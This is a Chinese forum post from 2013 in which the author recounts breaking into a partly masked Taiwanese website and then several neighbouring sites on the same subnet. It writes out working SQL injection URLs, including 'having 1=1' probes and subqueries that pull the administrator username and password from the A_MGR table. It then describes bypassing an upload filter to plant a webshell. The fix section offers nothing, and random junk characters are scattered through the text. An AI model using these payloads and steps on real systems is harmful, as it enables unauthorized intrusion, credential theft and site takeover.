发现一个注入点
, F9 W7 s" T8 I) R' }5 m9 Yhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
% R! q! C1 B( ?* }6 c
# |7 ?- i7 m. N习惯性的加’having1=1--" W: @ T$ p+ X
( V0 ?4 D% A! s1 C [
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
# u, O6 P; p( w3 R/ b+ j! c% U% J8 _9 B* H; v& Y
0
, ^; f7 }! o% D" m& M9 i
0 m: L. z) b- f爆出Diary_A.dl_Title(这时候很激动啊)9 E2 G6 U+ u/ p
* F6 ?! F6 _$ p6 v: k; ?
那么继续
1 _, S. X- K1 K1 H! J/ k# Whttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
: c/ @) G6 Y6 f/ Q# [' l
+ l. P) g; Y# t1 v' q继续,一直爆下去
4 f; N5 ~. V: S6 Y
0 b4 k1 a( B8 j; [% O# `( H爆到几个字段和表段 但是没找到需要的管理用户的字段
7 w/ f0 w8 U" S( U' D
7 z" B" C( }0 q7 f x. v蛋疼了 怎么办 然后去后台登陆页看源码
7 S! K. y) w/ J* U) i8 `1 m- k1 ~ p7 e4 E. Z: Q. r
05 }$ ^- H. `* q( f7 R# c) z
- I* f) c! ^; d, l7 |+ _. ~3 O5 H
Input name= “ADUID”
4 o8 N3 O/ N! iInput name= “ADPWD”7 ]6 i+ s* d1 F8 r( b
G$ @7 N- e! l, g很幸运 找到了字段那就继续
6 F+ u; m# B8 D0 K& b5 _' L/ g找到之后开始爆用户4 j* ^, |% E! |
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
) W" @" @1 c I) F9 s, d# I爆密码. j$ P; @. C. K! X* M
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
. x& o8 A4 y7 f4 _6 R8 Q测试了下 这个注入点只能爆到文章哪里的表
- e8 e d& z* O
- u+ d' k+ z) K8 ?4 H' s* \! f# l头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
6 d/ h9 `, Q9 u. Z1 p+ E4 t8 Y% L; J; p+ e' S4 {4 S% f
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了, d. H6 W0 w. ?2 ?, D3 c9 V
5 D: i+ h; O# I0 ~' K0 b473- g; }1 \% J% _+ _
# q+ }- {6 K" Y3 {0 H进后台7 |* C5 e1 k$ h. t5 ~
" {1 j5 B* I1 D. q6 O
; o& ?6 P T8 E( G( a
发现几个上传点 有的地方不能上传 而且防止恶意代码
$ h4 Y! Q) _' w- n: N9 A3 }# n* b- V% M
没办法 各种百度各种找大牛 找到一只好像可以突破的马2 v5 ~: F X; C
9 w& ~& ^ Y8 r/ J( r( B4 {% }$ z+ u; i2 `3 [8 H$ y$ j
在系统管理那里直接上传 不过没有显示地址9 h6 N9 m2 m, s7 L! c
7 {% R" V$ D" b& j4 ~& y
再上传一次 抓包 搞定OK2 z1 e ?0 ^3 ]2 S0 ]& e, G/ f# N
2 Z$ S+ R+ O" _2 L# `, J* K8 b" H5 ^/ X8 X+ z1 @. i8 R. w
9 J5 j$ V3 k4 l; I4726 K& a/ M: ]% A X2 i. S' E& h
/ n$ e4 K7 L/ K& a$ P" a# \$ d* f2 g7 e晚上不行了 去睡觉。。。
T& \' B! X! I" \0 t第二天刚起床 闲的没事做继续日站吧
* \' h; @: u! D7 \* \! _) W. p7 t: l3 ]( h+ h" j
找个站 就把这个站的旁c扫了下# R& \2 F* U0 m. J6 U7 e: \& v2 o
% H# X4 ~" D) w+ C
发现c段也有一个购物站 ,然后还和这个站的模板差不多: R1 N& {9 L; Z6 c
8 U& A/ M, X- x0 ~1 W4 N) @5 V
就找到会员登录口测试
! U9 G; m6 F( ?% T) }# T/ x4 z
~/ S' B5 S* K/ l$ m3 ? D'and (select top 1 MGR_UID from A_MGR)>0—; B! i+ s0 a) C2 d, a* o
果断爆到了 这时候我很激动 通杀% e) h3 l4 ^ B
- y' ^0 T5 _- d" ~8 Q
再次翻c段( G! |- o+ m# s9 t M6 I; V
1 g1 Z! ~1 ~; r9 i, b翻出几个站 都成功拿下) a+ C5 Q& }. \9 z
9 o0 }4 R2 [9 i8 y+ M( ^
3 {( K: i* n/ @5 x0 m
; _1 D( W' T+ O. o修复方案:
' t& `, Y' X" ]: M0 z$ Q$ \( ]他们比我专业 8 A7 u/ p! u- c: B1 ^
: f6 R' C& e9 Y/ k7 [, |9 ?
8 w- O+ `/ R1 W7 e D5 L* r- I; Q. n8 M3 T. O. y0 R
|
发表于 2013-4-4 17:40:38
收藏
支持
反对